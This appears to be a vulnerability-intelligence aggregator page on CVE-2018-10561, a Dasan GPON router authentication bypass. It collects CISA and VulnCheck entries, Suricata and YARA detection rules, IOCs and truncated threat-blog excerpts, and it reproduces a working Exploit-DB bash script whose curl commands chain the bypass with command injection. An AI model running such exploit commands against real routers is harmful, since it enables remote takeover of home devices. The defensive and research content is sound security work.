CVE-2018-10561
published 2018-05-04CVE-2018-10561: An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-04-21
Exploited in the wild
EPSS
93.32%
99.8th percentile
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.
Detection & IOCsextracted from sources · hover to see the quote
- →Authentication bypass on Dasan GPON routers is triggered by appending '?images' to any authenticated URL path. Monitor HTTP requests containing '?images' in the URI targeting GPON management interfaces. ↗
- →The WICKED bot scans ports 8080, 8443, 80, and 81 via raw socket SYN connections to identify and exploit vulnerable IoT devices. Anomalous SYN scanning across these ports from IoT devices may indicate WICKED bot activity. ↗
- →Omni botnet samples were delivered via the GPON vulnerability (CVE-2018-10561) and hosted in a /bins/ directory on 185.246.152.173. Monitor for HTTP GET requests to /bins/ paths on that IP. ↗
- →Yowai (Mirai variant) uses a dictionary attack with a specific set of default credentials. Detect brute-force login attempts using these username/password pairs against router Telnet/SSH services. ↗
- →The WICKED bot's configuration table is XOR-encrypted with key 0x37, consistent with Mirai variants. Use this key when decrypting captured bot configs for analysis. ↗
- →Trend Micro IPS signature 1134610 covers CVE-2018-10561 exploitation. Ensure this signature is active on network security devices monitoring GPON router traffic. ↗
- ·CVE-2018-10561 (authentication bypass) is a prerequisite for CVE-2018-10562 (command injection/RCE). Exploitation of the RCE requires chaining both vulnerabilities. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Dasan GPON Routers Command Injection Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Vulnerability: Dasan GPON Routers Command Injection Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10562
Remediation Due Date: 2022-04-21
CISA
Dasan GPON Routers Authentication Bypass Vulnerability
cisa·2022-03-31·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Vulnerability: Dasan GPON Routers Authentication Bypass Vulnerability
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-10561
Remediation Due Date: 2022-04-21
GHSA
GHSA-9f5c-v3c9-rfhg: An issue was discovered on Dasan GPON home routers
ghsa_unreviewed·2022-05-14
CVE-2018-10561 [CRITICAL] CWE-287 GHSA-9f5c-v3c9-rfhg: An issue was discovered on Dasan GPON home routers
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.
VulnCheck
Dasan GPON Routers Authentication Bypass Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10561 [CRITICAL] CWE-287 Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers Authentication Bypass Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2018-10561; https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.virusbulletin.com/virusbulletin/2019/12/vb2019-paper-absolutely-routed-why-routers-are-new-bul
VulnCheck
Dasan GPON Routers Command Injection Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-10562 [CRITICAL] CWE-78 Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers Command Injection Vulnerability
Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10561, exploitation can allow an attacker to perform remote code execution.
Affected: Dasan Gigabit Passive Optical Network (GPON) Routers
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/; https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_02B-3_Herwig_paper.pdf; https://www.trendmicro.com/en_us/research/19/e/new-mirai-variant-uses-multiple-exploits
Suricata
ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
suricata·2019-03-06·CVSS 9.8
CVE-2018-10561 [CRITICAL] ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"?images/"; pcre:"/(?:\/GponForm\/diag_FORM\?images\/|\.html\?images\/)/i"; http.request_body; content:"XWebPageName=diag&diag"; startswith; fast_pattern; reference:url,www.vpnmentor.com/blog/critical-vulnerability-gpon-router/; classtype:attempted-admin; sid:2027063; rev:4; metadata:created_at 2019_03_06, cve CVE_2018_10561, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001
Suricata
ET EXPLOIT HackingTrio UA (Hello, World)
suricata·2018-05-11
CVE-2018-10561 ET EXPLOIT HackingTrio UA (Hello, World)
ET EXPLOIT HackingTrio UA (Hello, World)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT HackingTrio UA (Hello, World)"; flow:established,to_server; http.method; content:"POST"; http.user_agent; content:"Hello, World"; fast_pattern; endswith; reference:cve,2018-10561; reference:cve,2018-10562; reference:url,github.com/f3d0x0/GPON; classtype:attempted-admin; sid:2025576; rev:4; metadata:attack_target IoT, created_at 2018_05_11, cve CVE_2018_10561, deployment Perimeter, performance_impact Low, signature_severity Major, tag GPON, updated_at 2020_09_16;)
YARA
Linux_Exploit_CVE_2018_10561_0f246e33
yara·CVSS 9.8
CVE-2018-10561 [CRITICAL] Linux_Exploit_CVE_2018_10561_0f246e33
rule Linux_Exploit_CVE_2018_10561_0f246e33 {
meta:
author = "Elastic Security"
id = "0f246e33-0e98-4778-8a2f-14876d1a0efe"
fingerprint = "718b66d3d65d31f0908c8f7d7aee8113e9b51cb576cd725bbca1a23d3ccd4d72"
creation_date = "2021-01-12"
last_modified = "2021-09-16"
threat_name = "Linux.Exploit.CVE-2018-10561"
reference_sample = "eac08c105495e6fadd8651d2e9e650b6feba601ec78f537b17fb0e73f2973a1c"
severity = 100
arch_context = "x86"
scan_context = "file, memory"
license = "Elastic License v2"
os = "linux"
strings:
$a = { 0B DF 0B 75 87 8C 5C 03 03 7A 4B 7A 95 4A A5 D2 13 6A 6A 5A 5A }
condition:
all of them
}
Exploit-DB
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
exploitdb·2019-02-28·CVSS 9.8
CVE-2019-3921 [CRITICAL] Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
---
#!/usr/bin/python3
import argparse
import requests
import urllib.parse
import binascii
import re
def run(target):
""" Execute exploitation """
# We're using CVE-2018-10561 and/or it's extension in order to exploit this
# Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
# issue after successful authentication: "useradmin" permission is enough
#
# IP Spoofing. Perspective option here too
#
# Step 1. Just a request to adjust stack for the exploit to work
#
# POST /GponForm/device_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en
Exploit-DB
GPON Routers - Authentication Bypass / Command Injection
exploitdb·2018-05-03
CVE-2018-10562 GPON Routers - Authentication Bypass / Command Injection
GPON Routers - Authentication Bypass / Command Injection
---
#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…."
sleep 3
echo "[+] Retrieving the ouput…."
curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’
Sans Isc
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
blogs_sans_isc·2026-06-25
CVE-2016-20017 What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary], (Wed, Jun 24th)
What do Ports Hear When Nobody's Listening? An Assessment of Automated Cybercrime [Guest Diary]
Published: 2026-06-24. Last Updated: 2026-06-25 00:39:08 UTC
by Nicole Phillips, SANS.edu BACS Student (Version: 1)
0 comment(s)
[This is a Guest Diary by Nicole Phillips, an ISC intern as part of the SANS.edu BACS program]
"I was just sitting here enjoying the company. Plants got a lot to say, if you take the time to listen."
— Eeyore, Winnie the Pooh
Introduction: Listening to the Static
Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That sa
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
Januar
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
# RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus
2025/10/09
Read time: ( words)
Save to Folio
Key takeaways
- The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
- Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vul
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Cyber Threats
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus 2025/10/09 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022 .
January
Trendmicro
RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
blogs_trendmicro·2025-10-09·CVSS 8.8
[HIGH] RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
Ciberamenazas
## RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits
The Trend Zero Day Initiative™ (ZDI) and Trend™ Research teams have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.
By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus Oct 09, 2025 Read time: ( words)
Save to Folio
Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.
Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:
December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Ow
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise 2025 Mass Internet Exploitation Report: Attackers Are Moving Faster Than Ever — Are You Ready?
blogs_greynoiseio·2025-02-27
GreyNoise 2025 Mass Internet Exploitation Report: Attackers Are Moving Faster Than Ever — Are You Ready?
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bleepingcomputer
New Aquabotv3 botnet malware targets Mitel command injection flaw
blogs_bleepingcomputer·2025-01-29·CVSS 7.2
CVE-2024-41710 [HIGH] New Aquabotv3 botnet malware targets Mitel command injection flaw
## New Aquabotv3 botnet malware targets Mitel command injection flaw
## Bill Toulas
A new variant of the Mirai-based botnet malware Aquabot has been observed actively exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones.
The activity was discovered by Akamai's Security Intelligence and Response Team (SIRT), who reports that this is the third variant of Aquabot that falls under their radar.
The malware family was introduced in 2023, and a second version that added persistence mechanisms was released later. The third variant, 'Aquabotv3,' introduced a system that detects termination signals and sends the info to the command-and-control (C2) server.
Akamai comments that Aquabotv3's mechanism to report back kill attempts is unusual for botnets and may have been
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
UNSTABLE Botnet
Condi DDoS Botnet
UDP Flooder and Process Checker
Skibidi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Trendmicro
IoT Monitoring-Daten zu Threat Defense umwandeln
blogs_trendmicro·2020-10-14
IoT Monitoring-Daten zu Threat Defense umwandeln
Cyberbedrohungen
## IoT Monitoring-Daten zu Threat Defense umwandeln
Um seine Kunden noch besser vor Cyberbedrohungen zu schützen, verwendet Trend Micro die gesammelten Indicators of Compromise aus IoTAngriffen, um die Fähigkeit zur Erkennung von Bedrohungen zu verbessern.
By: Shimamura Makoto Oct 14, 2020 Read time: ( words)
Save to Folio
Originalartikel von Shimamura Makoto, Senior Security Specialist
Der Sicherheitsbericht zur Jahresmitte 2020 von Trend Micro weist im Vergleich zum zur zweiten Jahreshälfte 2019 eine Steigerung von 70 Prozent bei Angriffen auf Geräte und Router aus. Dazu gehören auch Attacken auf Internet-of-Things (IoT)-Systeme, die in ihrer Häufung beunruhigen. Die Sicherheitsforscher von Trend Micro überwachen die Trends bezüglich dieser Angriffe und untersuchte
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-08
Transforming IoT Monitoring Data into Threat Defense
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto
2020/10/08
Read time: ( words)
Save to Folio
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Checkpoint
21st September – Threat Intelligence Bulletin
blogs_checkpoint·2020-09-21
CVE-2020-1472 21st September – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 21st September – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 21st September 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has unraveled an ongoing surveillance operation by Iranian entities that have been targeting Iranian expats and dissidents for years. The campaign targets both PCs and mobile devices, and is focused on stealing keys and data from social apps.
Check Point SandBlast Mobile, SandBlast Network
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Trendmicro
Mirai-Varianten zielen auf Videoüberwachungssysteme
blogs_trendmicro·2020-02-06·CVSS 9.8
[CRITICAL] Mirai-Varianten zielen auf Videoüberwachungssysteme
Ausnutzung von Schwachstellen
## Mirai-Varianten zielen auf Videoüberwachungssysteme
Sicherheitsforscher von Trend Micro haben zwei Varianten der Internet of Things (IoT)-Malware, Mirai, gefunden. Diese nutzen neue Verbreitungsmethoden und verschaffen sich Zugang über eine Schwachstelle in Videoüberwachungs-Speichersystemen.
By: Trend Micro Feb 06, 2020 Read time: ( words)
Save to Folio
Von Trend Micro
Sicherheitsforscher von Trend Micro haben zwei Varianten der Internet of Things (IoT) -Malware, Mirai, gefunden. Die beiden Varianten, SORA (IoT.Linux.MIRAI.DLEU) und UNSTABLE (IoT.Linux.MIRAI.DLEV) nutzen neue Verbreitungsmethoden und verschaffen sich Zugang über die Schwachstelle CVE-2020-6756 in Rasilient PixelStor5000 -Videoüberwachungs-Speichersystemen.
Mirai ist eine Malware, di
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
Aug 13, 2019
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
2019/08/13
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
May 23, 2019
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
2019/05/23
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campaig
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
